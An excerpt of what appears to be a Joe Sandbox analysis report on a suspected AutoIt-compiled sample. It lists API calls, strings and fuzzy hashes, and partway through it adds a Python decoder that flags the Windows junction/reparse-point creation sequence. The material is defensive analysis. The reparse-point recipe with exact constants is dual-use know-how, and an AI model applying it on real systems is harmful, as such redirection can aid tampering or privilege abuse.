• CharUpperBuffW.USER32(?,00000000), ref: 0087D941
• _wcscmp.LIBCMT ref: 0087D95F
• _wcsstr.LIBCMT ref: 0087D970
• GetClassNameW.USER32(00000018,?,00000400), ref: 0087D9A8
• _wcscmp.LIBCMT ref: 0087D9B8
• GetWindowTextW.USER32(00000002,?,00000400), ref: 0087D9DF
• GetClassNameW.USER32(00000018,?,00000400), ref: 0087DA28
• _wcscmp.LIBCMT ref: 0087DA38
• GetClassNameW.USER32(00000010,?,00000400), ref: 0087DA60
• GetWindowRect.USER32(00000004,?), ref: 0087DAC9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
Similarity
• API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
• String ID: @$ThumbnailClass
• API String ID: 1788623398-1539354611
• Opcode ID: 51c1cd11389eed61330b16e63bdbf9fe7d6b5cee1fe2fd1040fdfe9dee4d2c71
• Instruction ID: 493c284807b4c5a47dbade2cce554102de396ef5162babee345588e15bf346d8
• Opcode Fuzzy Hash: 51c1cd11389eed61330b16e63bdbf9fe7d6b5cee1fe2fd1040fdfe9dee4d2c71
• Instruction Fuzzy Hash: D5818F310083099BDB01DF54C885FAABBF8FF94714F14846AED89DA09ADB30DD46CBA1
APIs
Strings
Similarity
• API ID: __wcsnicmp
• String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
• API String ID: 1038674560-1810252412
• Opcode ID: b887e08d9b87a0feb2698719bc59f6d0790ad2a092d91a6f69b72aa61f609502
• Instruction ID: d0cd7fecb56f33b7c0e5fddc326a5965c7a7d94dd9dffaeb107fb79413a8f5ba
• Opcode Fuzzy Hash: b887e08d9b87a0feb2698719bc59f6d0790ad2a092d91a6f69b72aa61f609502
• Instruction Fuzzy Hash: DE31BC31A4430CE6DB14EB68CD43EAE73B4FF20760F204129F965F11EAEB65EA148613
APIs
• LoadIconW.USER32(00000063), ref: 0087EAB0
• SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0087EAC2
• SetWindowTextW.USER32(?,?), ref: 0087EAD9
• GetDlgItem.USER32(?,000003EA), ref: 0087EAEE
• SetWindowTextW.USER32(00000000,?), ref: 0087EAF4
• GetDlgItem.USER32(?,000003E9), ref: 0087EB04
• SetWindowTextW.USER32(00000000,?), ref: 0087EB0A
• SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0087EB2B
• SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0087EB45
• GetWindowRect.USER32(?,?), ref: 0087EB4E
• SetWindowTextW.USER32(?,?), ref: 0087EBB9
• GetDesktopWindow.USER32 ref: 0087EBBF
• GetWindowRect.USER32(00000000), ref: 0087EBC6
• MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0087EC12
• GetClientRect.USER32(?,?), ref: 0087EC1F
• PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0087EC44
• SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0087EC6F
Similarity
• API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
• String ID:
• API String ID: 3869813825-0
• Opcode ID: 10bc0e5e4ef0266b42ba5ec18185e9c913dd81941d7885b07ea6f347b7123c43
• Instruction ID: cd4c6464e6c8dcbda8e37c8c534dea6c4717a1933267e6b44bf9df5be0e17575
• Opcode Fuzzy Hash: 10bc0e5e4ef0266b42ba5ec18185e9c913dd81941d7885b07ea6f347b7123c43
• Instruction Fuzzy Hash: A5513E71900709AFDB20AFA8CD89E6EBBF5FF08704F004968E596E65A4C774E944CB50
APIs
• LoadCursorW.USER32(00000000,00007F8A), ref: 008979C6
• LoadCursorW.USER32(00000000,00007F00), ref: 008979D1
• LoadCursorW.USER32(00000000,00007F03), ref: 008979DC
• LoadCursorW.USER32(00000000,00007F8B), ref: 008979E7
• LoadCursorW.USER32(00000000,00007F01), ref: 008979F2
• LoadCursorW.USER32(00000000,00007F81), ref: 008979FD
• LoadCursorW.USER32(00000000,00007F88), ref: 00897A08
• LoadCursorW.USER32(00000000,00007F80), ref: 00897A13
• LoadCursorW.USER32(00000000,00007F86), ref: 00897A1E
• LoadCursorW.USER32(00000000,00007F83), ref: 00897A29
• LoadCursorW.USER32(00000000,00007F85), ref: 00897A34
• LoadCursorW.USER32(00000000,00007F82), ref: 00897A3F
• LoadCursorW.USER32(00000000,00007F84), ref: 00897A4A
• LoadCursorW.USER32(00000000,00007F04), ref: 00897A55
• LoadCursorW.USER32(00000000,00007F02), ref: 00897A60
• LoadCursorW.USER32(00000000,00007F89), ref: 00897A6B
• GetCursorInfo.USER32(?), ref: 00897A7B
Similarity
• API ID: Cursor$Load$Info
• String ID:
• API String ID: 2577412497-0
• Opcode ID: 0be67832ba11560e43273143018f12306b1dc1c682c9be465f9b4723b47a0c6c
• Instruction ID: 36acfcb96ddfcdb592c74c2fe201ce29b583eeddd56a31c861e1df5e049eaef4
• Opcode Fuzzy Hash: 0be67832ba11560e43273143018f12306b1dc1c682c9be465f9b4723b47a0c6c
• Instruction Fuzzy Hash: 0A3113B0D0831A6ADF10AFB68C8995FBFE8FF04750F54453AE50DE7280DA78A5008FA1
APIs
  • Part of subcall function 0085E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0084C8B7,?,00002000,?,?,00000000,?,0084419E,?,?,?,008DDC00), ref: 0085E984
  • Part of subcall function 0084660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008453B1,?,?,008461FF,?,00000000,00000001,00000000), ref: 0084662F
• __wsplitpath.LIBCMT ref: 0084C93E
  • Part of subcall function 00861DFC: __wsplitpath_helper.LIBCMT ref: 00861E3C
• _wcscpy.LIBCMT ref: 0084C953
• _wcscat.LIBCMT ref: 0084C968
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0084C978
• SetCurrentDirectoryW.KERNEL32(?), ref: 0084CABE
  • Part of subcall function 0084B337: _wcscpy.LIBCMT ref: 0084B36F
Strings
Similarity
• API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
• String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
• API String ID: 2258743419-1018226102
• Opcode ID: 6c520c193513d9f425af5e9b4212a3cb44419c64f58034ac1645a55611770b1f
• Instruction ID: d5cad79b890619d20578526afaa525917c15075f20b031620ee977e480a87557
• Opcode Fuzzy Hash: 6c520c193513d9f425af5e9b4212a3cb44419c64f58034ac1645a55611770b1f
• Instruction Fuzzy Hash: 2B1237715083459BC724EF28C881AAFBBE9FF99314F44492EF589D3261DB309A49CB53
APIs
• _memset.LIBCMT ref: 008ACEFB
• DestroyWindow.USER32(?,?), ref: 008ACF73
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 008ACFF4
• SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 008AD016
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 008AD025
• DestroyWindow.USER32(?), ref: 008AD042
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00840000,00000000), ref: 008AD075
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 008AD094
• GetDesktopWindow.USER32 ref: 008AD0A9
• GetWindowRect.USER32(00000000), ref: 008AD0B0
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 008AD0C2
• SendMessageW.USER32(00000000,00000421,?,00000000), ref: 008AD0DA
  • Part of subcall function 0085B526: GetWindowLongW.USER32(?,000000EB), ref: 0085B537
Strings
Similarity
• API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
• String ID: 0$tooltips_class32
• API String ID: 3877571568-3619404913
• Opcode ID: 0c73ed21b4a36c79ee1126a517865e2015f62bededbe709de3d26a4e95a0b38d
• Instruction ID: 0a82ac9c086381ca7bad30440ec2b5ab30e8493d5a42326517dd959822b664dd
• Opcode Fuzzy Hash: 0c73ed21b4a36c79ee1126a517865e2015f62bededbe709de3d26a4e95a0b38d
• Instruction Fuzzy Hash: 2D71A8B0144705AFE720CF28CC84F6677E5FB8A708F084519F986C76A1EB75E942DB22
APIs
  • Part of subcall function 0085B34E: GetWindowLongW.USER32(?,000000EB), ref: 0085B35F
• DragQueryPoint.SHELL32(?,?), ref: 008AF37A
  • Part of subcall function 008AD7DE: ClientToScreen.USER32(?,?), ref: 008AD807
  • Part of subcall function 008AD7DE: GetWindowRect.USER32(?,?), ref: 008AD87D
  • Part of subcall function 008AD7DE: PtInRect.USER32(?,?,008AED5A), ref: 008AD88D
• SendMessageW.USER32(?,000000B0,?,?), ref: 008AF3E3
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 008AF3EE
• DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 008AF411
• _wcscat.LIBCMT ref: 008AF441
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 008AF458
• SendMessageW.USER32(?,000000B0,?,?), ref: 008AF471
• SendMessageW.USER32(?,000000B1,?,?), ref: 008AF488
• SendMessageW.USER32(?,000000B1,?,?), ref: 008AF4AA
• DragFinish.SHELL32(?), ref: 008AF4B1
• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 008AF59C
Strings
Similarity
• API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
• API String ID: 169749273-3440237614
• Opcode ID: df6c2f8c4f7614fdea4c9e15e056f1c2f78e99b05735e37be6d93a185375afc5
• Instruction ID: 02a2248b7686539a3416d89fa73bf7b0919ed5044302ca074af2c0ed1c113c03
• Opcode Fuzzy Hash: df6c2f8c4f7614fdea4c9e15e056f1c2f78e99b05735e37be6d93a185375afc5
• Instruction Fuzzy Hash: 02614871108304AFD711EF64CC85EABBBF8FF99710F000A2EF695961A1DB709A09CB52
APIs
• VariantInit.OLEAUT32(00000000), ref: 0088AB3D
• VariantCopy.OLEAUT32(?,?), ref: 0088AB46
• VariantClear.OLEAUT32(?), ref: 0088AB52
• VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0088AC40
• __swprintf.LIBCMT ref: 0088AC70
• VarR8FromDec.OLEAUT32(?,?), ref: 0088AC9C
• VariantInit.OLEAUT32(?), ref: 0088AD4D
• SysFreeString.OLEAUT32(00000016), ref: 0088ADDF
• VariantClear.OLEAUT32(?), ref: 0088AE35
• VariantClear.OLEAUT32(?), ref: 0088AE44
• VariantInit.OLEAUT32(00000000), ref: 0088AE80
Strings
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                • API String ID: 3730832054-3931177956
                                                                                • Opcode ID: b1b1a9e9d3b0b5d2b3caffaa0864f059a5118771c1565e0ac93857d76dca1177
                                                                                • Instruction ID: beab6346fade79ed85a60fc08a8cecc46a1b383e61c79e9eb66b5b8cfff2fee6
                                                                                • Opcode Fuzzy Hash: b1b1a9e9d3b0b5d2b3caffaa0864f059a5118771c1565e0ac93857d76dca1177
                                                                                • Instruction Fuzzy Hash: 1DD1DF71600609DBEB28BF69C885B6AB7B9FF04710F148466E505DB2C1DB74EC40DBA7
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(?,?), ref: 008A71FC
                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 008A7247
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharMessageSendUpper
                                                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                • API String ID: 3974292440-4258414348
                                                                                • Opcode ID: e97e1439e7bbf5392099a1755e28276234b5a36ee968f7693f01895d4790cf14
                                                                                • Instruction ID: dc2d3344ee78ad189f43bc12823d32178fb4e9f0a82764071498cbbe06cc9429
                                                                                • Opcode Fuzzy Hash: e97e1439e7bbf5392099a1755e28276234b5a36ee968f7693f01895d4790cf14
                                                                                • Instruction Fuzzy Hash: F1915F302046059BDB14EF28C851A6EB7A1FF55314F00985DFD96DB7A2DB30ED0ADB82
                                                                                APIs
                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 008AE5AB
                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,008A9808,?), ref: 008AE607
                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 008AE647
                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 008AE68C
                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 008AE6C3
                                                                                • FreeLibrary.KERNEL32(?,00000004,?,?,?,008A9808,?), ref: 008AE6CF
                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 008AE6DF
                                                                                • DestroyIcon.USER32(?), ref: 008AE6EE
                                                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 008AE70B
                                                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 008AE717
                                                                                  • Part of subcall function 00860FA7: __wcsicmp_l.LIBCMT ref: 00861030
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                • String ID: .dll$.exe$.icl
                                                                                • API String ID: 1212759294-1154884017
                                                                                • Opcode ID: c73875f7f99126c3f201e5b9e2b5a322b886a8eaac71d39172b713bd2034e3e6
                                                                                • Instruction ID: 4d65a2fc9f2e9e370058b01168e2edf983f33c97b29b3c794a3ec1cc8912de1a
                                                                                • Opcode Fuzzy Hash: c73875f7f99126c3f201e5b9e2b5a322b886a8eaac71d39172b713bd2034e3e6
                                                                                • Instruction Fuzzy Hash: 7F61E071900319FAEB24EF68CC46FBE7BA8FB19724F104915F911D61D1EB74A980CBA0
                                                                                APIs
                                                                                  • Part of subcall function 0084936C: __swprintf.LIBCMT ref: 008493AB
                                                                                  • Part of subcall function 0084936C: __itow.LIBCMT ref: 008493DF
                                                                                • CharLowerBuffW.USER32(?,?), ref: 0088D292
                                                                                • GetDriveTypeW.KERNEL32 ref: 0088D2DF
                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0088D327
                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0088D35E
                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0088D38C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                • API String ID: 1148790751-4113822522
                                                                                • Opcode ID: 0f0d66ad284df4bcd51cca67b7da1b0eadd6946e3551d05ddd5cec7e42aedd82
                                                                                • Instruction ID: 560ba17c5bc2e00765d52ac2a316b3a992f3fa6dea7fb8507b6e0ad913ccf2d9
                                                                                • Opcode Fuzzy Hash: 0f0d66ad284df4bcd51cca67b7da1b0eadd6946e3551d05ddd5cec7e42aedd82
                                                                                • Instruction Fuzzy Hash: 89512C711047099FC700EF25C98196EB7E8FF95758F10486DF895A7291EB31EE0ACB52
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,008B3973,00000016,0000138C,00000016,?,00000016,008DDDB4,00000000,?), ref: 008826F1
                                                                                • LoadStringW.USER32(00000000,?,008B3973,00000016), ref: 008826FA
                                                                                • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,008B3973,00000016,0000138C,00000016,?,00000016,008DDDB4,00000000,?,00000016), ref: 0088271C
                                                                                • LoadStringW.USER32(00000000,?,008B3973,00000016), ref: 0088271F
                                                                                • __swprintf.LIBCMT ref: 0088276F
                                                                                • __swprintf.LIBCMT ref: 00882780
                                                                                • _wprintf.LIBCMT ref: 00882829
                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00882840
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                • API String ID: 618562835-2268648507
                                                                                • Opcode ID: e91d13ac2742814318b51048df0e7ee6b1f38f7228e78ac0044f3a79e548db78
                                                                                • Instruction ID: 3ef3ebace2e1f576be91dabfa9b7dd4c667cd679e9974bb5eb74135c4abe4e30
                                                                                • Opcode Fuzzy Hash: e91d13ac2742814318b51048df0e7ee6b1f38f7228e78ac0044f3a79e548db78
                                                                                • Instruction Fuzzy Hash: E741E87280021DAACF14FBA8DD86EEEB778FF14344F100065B601F6192EA746F59CB62
                                                                                APIs
                                                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0088D0D8
                                                                                • __swprintf.LIBCMT ref: 0088D0FA
                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 0088D137
                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0088D15C
                                                                                • _memset.LIBCMT ref: 0088D17B
                                                                                • _wcsncpy.LIBCMT ref: 0088D1B7
                                                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0088D1EC
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0088D1F7
                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 0088D200
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0088D20A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                • String ID: :$\$\??\%s
                                                                                • API String ID: 2733774712-3457252023
                                                                                • Opcode ID: c5c5ca7c180cafba1d8cc1f5fa0deec0b2971be343ea290094b5607e98bcdc4e
                                                                                • Instruction ID: 2dbfa9079004e1bc86fb6599ff486a649c33feefd0170edd5cb4212865fd5703
                                                                                • Opcode Fuzzy Hash: c5c5ca7c180cafba1d8cc1f5fa0deec0b2971be343ea290094b5607e98bcdc4e
                                                                                • Instruction Fuzzy Hash: 54318076500209ABDB21EFA4DC49FAB77BDFF88740F1040B6F509D21A1E770A6458B25
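The API list in this entry, GetFullPathNameW, CreateDirectoryW, CreateFileW opened for GENERIC_WRITE (0x40000000) with OPEN_EXISTING (3) and FILE_FLAG_BACKUP_SEMANTICS|FILE_FLAG_OPEN_REPARSE_POINT (0x02200000), then DeviceIoControl with control code 0x000900A4 (FSCTL_SET_REPARSE_POINT) and the "\??\%s" NT path prefix, is the standard Windows sequence for turning a freshly created directory into a junction or mount point; the RemoveDirectoryW call is the clean-up on the failure path. The decoder below is an added example written for this report, not code from Joe Sandbox or from the sample: it names the raw constants the trace prints as hex and flags the open-as-reparse-point-then-FSCTL_SET_REPARSE_POINT shape in a call list. The constant tables are taken from winioctl.h/winnt.h; the sample trace is re-typed from the API list above with the report's "?" arguments replaced by None.

```python
"""Decode raw Win32 constants from a sandbox API trace and flag the
reparse-point (junction / mount point) creation sequence.

Added example for this report; constant tables are from winioctl.h and
winnt.h, the sample trace is re-typed from the report's API list.
"""

GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
CREATION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
            4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = {0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
              0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT",
              0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
              0x40000000: "FILE_FLAG_OVERLAPPED",
              0x80000000: "FILE_FLAG_WRITE_THROUGH"}

# CTL_CODE(DeviceType, Function, Method, Access)
#   = (DeviceType << 16) | (Access << 14) | (Function << 2) | Method
METHOD = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT",
          2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
FILE_DEVICE_FILE_SYSTEM = 0x9
# Reparse-point FSCTL function numbers on FILE_DEVICE_FILE_SYSTEM
FSCTL_FUNCTIONS = {41: "FSCTL_SET_REPARSE_POINT",
                   42: "FSCTL_GET_REPARSE_POINT",
                   43: "FSCTL_DELETE_REPARSE_POINT"}


def _flags(value, table):
    """Split a bitmask into the named bits it contains; unknown bits stay hex."""
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table.keys())
    if rest:
        names.append(hex(rest))
    return names


def decode_ioctl(code):
    """Break a DeviceIoControl control code into its CTL_CODE fields."""
    device = (code >> 16) & 0xFFFF
    access = (code >> 14) & 0x3
    function = (code >> 2) & 0xFFF
    method = code & 0x3
    name = FSCTL_FUNCTIONS.get(function) if device == FILE_DEVICE_FILE_SYSTEM else None
    return {"device": device, "access": access, "function": function,
            "method": METHOD[method], "name": name}


def decode_createfile(desired_access, creation, flags):
    """Name the CreateFileW argument values the trace shows as raw hex."""
    return {"access": _flags(desired_access, GENERIC_ACCESS),
            "creation": CREATION.get(creation, hex(creation)),
            "flags": _flags(flags, FILE_FLAGS)}


def is_reparse_point_write(trace):
    """True if the trace opens a path for writing as a reparse point and then
    issues FSCTL_SET_REPARSE_POINT, i.e. the junction / mount-point creation
    shape. `trace` is a list of (api_name, args_tuple) in call order."""
    opened_for_reparse_write = False
    for api, args in trace:
        if api == "CreateFileW":
            desired_access, flags = args[1], args[5]
            opened_for_reparse_write = bool(desired_access & 0x40000000
                                            and flags & 0x00200000)
        elif api == "DeviceIoControl" and opened_for_reparse_write:
            if decode_ioctl(args[1])["name"] == "FSCTL_SET_REPARSE_POINT":
                return True
    return False


# Constructed from the report's API list; "?" arguments become None.
SAMPLE_TRACE = [
    ("GetFullPathNameW", (None, 0x7FFF, None, None)),
    ("CreateDirectoryW", (None, 0)),
    ("CreateFileW", (None, 0x40000000, 0, 0, 3, 0x02200000, 0)),
    ("DeviceIoControl", (0, 0x000900A4, None, None, 0, 0, None, 0)),
    ("CloseHandle", (0,)),
]

if __name__ == "__main__":
    print(decode_ioctl(0x000900A4))
    print(decode_createfile(0x40000000, 3, 0x02200000))
    print(is_reparse_point_write(SAMPLE_TRACE))
```

The check deliberately keys on the combination rather than on the IOCTL alone: FSCTL_SET_REPARSE_POINT against a handle opened without FILE_FLAG_OPEN_REPARSE_POINT is not how junctions are written, and a lone CreateFileW with 0x02200000 is also what backup and directory-enumeration code uses, so neither half is a useful signal on its own.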
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                                                • String ID:
                                                                                • API String ID: 884005220-0
                                                                                • Opcode ID: 36d211f121c500aeb4ac6f121e488fe96c403c3f115f2e67454ba85a7467fdac
                                                                                • Instruction ID: 1626a0a110c2de00d5d66a4358117f2740e168170d14de3994017ca9cf5239f6
                                                                                • Opcode Fuzzy Hash: 36d211f121c500aeb4ac6f121e488fe96c403c3f115f2e67454ba85a7467fdac
                                                                                • Instruction Fuzzy Hash: 3761F432988215EFDB205F28DC49B797BA4FF01324F258125E819EB19AEF34C94097A7
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 008AE754
                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 008AE76B
                                                                                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 008AE776
                                                                                • CloseHandle.KERNEL32(00000000), ref: 008AE783
                                                                                • GlobalLock.KERNEL32(00000000), ref: 008AE78C
                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 008AE79B
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 008AE7A4
                                                                                • CloseHandle.KERNEL32(00000000), ref: 008AE7AB
                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 008AE7BC
                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,008CD9BC,?), ref: 008AE7D5
